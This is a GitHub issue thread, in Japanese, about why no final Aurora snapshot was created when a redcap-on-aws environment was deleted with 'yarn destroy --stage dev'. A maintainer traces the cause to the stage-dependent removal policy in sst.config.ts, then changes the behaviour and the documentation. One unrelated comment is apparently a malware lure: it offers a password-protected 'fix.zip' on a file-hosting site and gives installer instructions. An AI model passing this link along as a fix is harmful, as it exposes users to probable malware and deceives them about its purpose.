### ISSUE TITLE
環境削除時（yarn destroy）のAuroraスナップショットについて

### ISSUE THREAD

**Issue by ouh-kaneko** [aws-samples/redcap-on-aws#66]
環境を「yarn destroy --stage dev」で一度削除した際、
Auroraでは最終のスナップショットが取得される認識でしたが、実際には作成されませんでした。

ソース上では、
AuroraServerlessV2.tsでは、呼び出し元の設定を優先して設定し、それ以外はスナップショットを取得すると記述されていますが、
呼び出し元のDatabase.tsでは、removalPolicyの設定が記述されていません。
なお、AWS CDKを参照するとRemovalPolicyはデフォルト値がDESTROYとなっております。
そのためにスナップショットが作成されないまま削除されたのでしょうか？

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jl4nz** [comment]
主な理由は次の通りだと思います:

```ts
// sst.config.ts 
if (app.stage !== 'prod') {
      app.setDefaultRemovalPolicy('destroy');
}
```

これは各環境によって異なりますが、ステージが "**prod**"と呼ばれる場合は、CDK のデフォルトに従います。

**Comment by jl4nz** [comment]
サンプル設定を使用するユーザーは「prod」ステージを使用すると想定していますが、おそらくそれは間違いです。

**Comment by ouh-kaneko** [comment]
コメントが遅くなり申し訳ありません。
[Readme](https://github.com/aws-samples/redcap-on-aws/blob/main/README.ja.md#%E7%92%B0%E5%A2%83%E3%81%AE%E5%89%8A%E9%99%A4)には、環境の削除時にデータベースのスナップショットが作成されるとあります。
これはstageがprodの場合のみということでしょうか？

**Comment by jl4nz** [comment]
正解です。「prod」ステージのみです。

これは上記のコードによるものです。

**Comment by jl4nz** [comment]
文書の更新に加えて、動作が変更されました。

基本的に、`dev`ステージのみがすべてのリソースを`destroy`し、`prod`は`retain`します。他のステージはCDKのデフォルトを使用します。つまり、この場合、データベースは`snapshot`を行います。

本番環境を保護したい場合は、`prod`を使用するか、ポリシーを`retain`に設定し、誤って削除されないようにすることをお勧めします。

https://github.com/aws-samples/redcap-on-aws/blob/main/README.ja.md#3-stagests-%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%81%AB%E3%82%88%E3%82%8Bstage%E8%A8%AD%E5%AE%9A

**Comment by ouh-kaneko** [comment]
RemovalPolicyの設定について承知しました、修正ありがとうございます。
